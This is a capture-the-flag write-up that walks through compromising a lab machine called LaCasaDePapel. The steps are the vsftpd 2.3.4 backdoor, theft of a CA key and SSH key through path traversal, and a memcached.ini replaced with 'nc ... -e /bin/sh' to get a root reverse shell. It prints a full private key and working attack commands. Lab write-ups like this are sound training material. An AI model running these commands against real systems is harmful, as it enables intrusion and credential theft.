- Use an old FTP exploit to open a backdoor on the box allowing us to get a Psy php shell
- Grab a CA key file off the box and a CA crt from the webpage
- Use the CA key file and CA crt file to generate a .p12 file and log into the webpage
- Use an LFI vulnerability to grab and SSH private key
- Use the private key to SSH in
- Replace the memcached.ini file with our own to spawn a reverse shell
First I start with an Nmap scan.
# Nmap 7.70 scan initiated Mon May 27 18:16:51 2019 as: nmap -sV -sC -T4 10.10.10.131 Nmap scan report for 10.10.10.131 Host is up (0.11s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 7.9 (protocol 2.0) | ssh-hostkey: | 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA) | 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA) |_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519) 80/tcp open http Node.js (Express middleware) |_http-title: La Casa De Papel 443/tcp open ssl/http Node.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-title: La Casa De Papel | ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel | Not valid before: 2019-01-27T08:35:30 |_Not valid after: 2029-01-24T08:35:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | tls-nextprotoneg: | http/1.1 |_ http/1.0 Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 27 18:17:24 2019 -- 1 IP address (1 host up) scanned in 32.68 seconds
A few ports are open but the one that peaks my interest is FTP. I know for a fact that vsftpd 2.3.4 is vulnerable. I will use the metasploit module exploit/unix/ftp/vsftpd_234_backdoorv2.3.4 Backdoor Command Execution for this.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic
The only thing that I have to set is the RHOSTS. Running the exploit I see that the exploit completed but no session was created
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131 RHOSTS => 10.10.10.131 msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.131:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
If I run the exploit a second time I get a different message. It says that the port for the backdoor is open but it’s not a shell which most likely means it’s not a bash shell.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.131:21 - The port used by the backdoor bind listener is already open [-] 10.10.10.131:21 - The service on port 6200 does not appear to be a shell [*] Exploit completed, but no session was created.
Running an Nmap scan on port 6200 will show that the port is now open
# nmap -p 6200 10.10.10.131 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-18 12:30 EDT Nmap scan report for 10.10.10.131 Host is up (0.096s latency). PORT STATE SERVICE 6200/tcp open lm-x Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
I can use netcat to connect to the backdoor. Once in I are greeted with a Psy Shell which is basically a PHP Shell
# nc -nv 10.10.10.131 6200 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Connected to 10.10.10.131:6200. Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
To navigate this shell I will need to use php commands. Listing the /home directory will reveal multiple different users
scandir('/home'); => [ ".", "..", "berlin", "dali", "nairobi", "oslo", "professor", ]
If I list the contents of each users home directory, I will see a couple things.
- The user flag is located in /home/berlin
- There is a ca.key file located at /home/nairobi
scandir('/home/berlin'); => [ ".", "..", ".ash_history", ".ssh", "downloads", "node_modules", "server.js", "user.txt", ] scandir('/home/dali'); => [ ".", "..", ".ash_history", ".config", ".qmail-default", ".ssh", "server.js", ] scandir('/home/nairobi'); => [ ".", "..", "ca.key", "download.jade", "error.jade", "index.jade", "node_modules", "server.js", "static", ] dir('/home/oslo'); => [ ".", "..", "Maildir", "inbox.jade", "index.jade", "node_modules", "package-lock.json", "server.js", "static", ]
Seeing that ca.key made me want to check out port 443. Navigating to the web page my hunch was confirmed when it asks us for a client certificate to access the full web page.
I copied the key to my host machine by reading the ca.key file and then pasting the contents into an empty file.
readfile("/home/nairobi/ca.key"); -----BEGIN PRIVATE KEY----- MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb 7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/ 2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89 1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ /CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+ q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUIIL9Og 7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH CTbdIPMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2 zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/ ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC 9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM 7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc 53udBEzjt3WPqYGkkDknVhjD -----END PRIVATE KEY-----
Now the next step is to grab the .crt file from your web browser. In Firefox navigate to Preferences > Privacy and Security > View Certificates. Once there, in the top right click on Authorities and scroll down until you see the certificate for lacasadepapelhtb.htb and then import/download it to you host machine.
Now I need to create our client certificate. To do this I will use openssl in combination with our ca.key file and lacasadepapelhtb.crt file. It will ask you for a password, just leave it blank.
# openssl pkcs12 -export -clcerts -in lacasadepapelhtb.crt -inkey ca.key -out lacasadepapel.p12 Enter Export Password: Verifying - Enter Export Password:
Now I need to import the lacasadepapel.p12 into Firefox. Go back to Preferences > Privacy and Security > View Certificates except this time choose Your Certificates. Then choose import and select the certificate.
Now if I go back to the web page and refresh it, I no longer get the client certificate error.
Looking through all the avi files I don’t find anything since they are all empty but I looking a the source code of the webpage does reveal something interesting at the bottom. I see some files stored in a /file directory with files that look like they are encoded in base64. Using this I can do 2 things:
- Grab the user flag in /home/berlin
- Grab an ssh private key from /home/berlin/.ssh/id_rsa and log in with it
# echo -n "../../../../home/berlin/user.txt" | base64 Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ= https://10.10.10.131/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=
Now I grab the ssh key
# echo -n "../../../../home/berlin/.ssh/id_rsa" | base64 Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E= https://10.10.10.131/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
Now my first thought was to SSH in as the user berlin since that is where I found the key but it didn’t work. I decided to try the other users and it ended up working with the user professor
# ssh -i id_rsa email@example.com _ ____ ____ ____ _ | | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| | | | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ | | |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ | |_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_| |_| lacasadepapel [~]$
Doing some basic enumeration, all I found Ire a couple files in the professor home directory but could really make much of it. My next thought was to see what processes Ire running in the background and to do this I would use a tool called pspy. I needed to get the pspy executable onto the box so I decided to use a python SimpleHTTPServer
# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Then I used wget from the professor account to copy it to his home directory.
# wget 10.10.14.21/pspy64 Connecting to 10.10.14.21 (10.10.14.21:80) pspy64 100% |************************************************| 4364k 0:00:00 ETA
Make the file executable and then run it. After some time has passed you should see an interesting process running.
2019/09/18 19:06:02 CMD: UID=0 PID=5962 | sudo -u nobody /usr/bin/node /home/professor/memcached.js
So this process contains the same memcached.js file that is in the professors home directory
# ls -la total 4392 drwxr-sr-x 4 professo professo 4096 Sep 18 19:04 . drwxr-xr-x 7 root root 4096 Feb 16 2019 .. lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null drwx------ 2 professo professo 4096 Jan 31 2019 .ssh -rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini -rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
I cant read the memcached.js but I can read the memcached.ini file.
cat memcached.ini [program:memcached] command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
This file has the same command that is being executed in the process. This tells me that the cron job is executing anything in this file as root. My first thought was I need to edit the memcached.ini file to put in a reverse shell to give me root but I saw that I don’t have write permissions. After sometime had passed, I had realized I needed to go back to the basics. Even though the file is owned by root, I can still delete the file because it is in our home directory. All I need to do is replace it with a file of our own with the same name to give us a root shell
# rm memcached.ini rm: remove 'memcached.ini'? y
Make sure the new file contains something like this
[program:memcached] command = nc 10.10.14.21 9000 -e /bin/sh
Now set up a nc listener and wait for the shell to spawn
# nc -lvnp 9000 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9000 Ncat: Listening on 0.0.0.0:9000 Ncat: Connection from 10.10.10.131. Ncat: Connection from 10.10.10.131:33131. whoami root
So now you can grab the root flag